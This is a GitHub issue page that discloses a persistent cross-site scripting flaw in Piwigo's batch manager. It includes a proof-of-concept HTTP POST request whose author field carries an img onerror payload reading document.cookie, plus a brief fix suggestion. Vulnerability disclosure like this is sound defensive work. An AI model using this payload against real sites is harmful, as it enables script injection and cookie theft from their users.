Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Description: In the single mode function of the Piwigo system, modifying the author parameter of the picture can cause persistent cross-site scripting Vulnerable Instances: /admin.php?page=batch_manager&mode=unit affected source code file
request
POST /admin.php?page=batch_manager&mode=unit HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 152 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/admin.php?page=batch_manager&mode=unit Cookie: pwg_id=mof6jca30q9tr1qu48hhvqi143 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 element_ids=4&name-4=test&author-4=11111%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E11&date_creation-4=&level-4=0&description-4=&submit=Submit
suggestion Restrict user input and output
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Description:


In the single mode function of the Piwigo system, modifying the author parameter of the picture can cause persistent cross-site scripting
Vulnerable Instances:
/admin.php?page=batch_manager&mode=unit
affected source code file
request
suggestion
Restrict user input and output
The text was updated successfully, but these errors were encountered: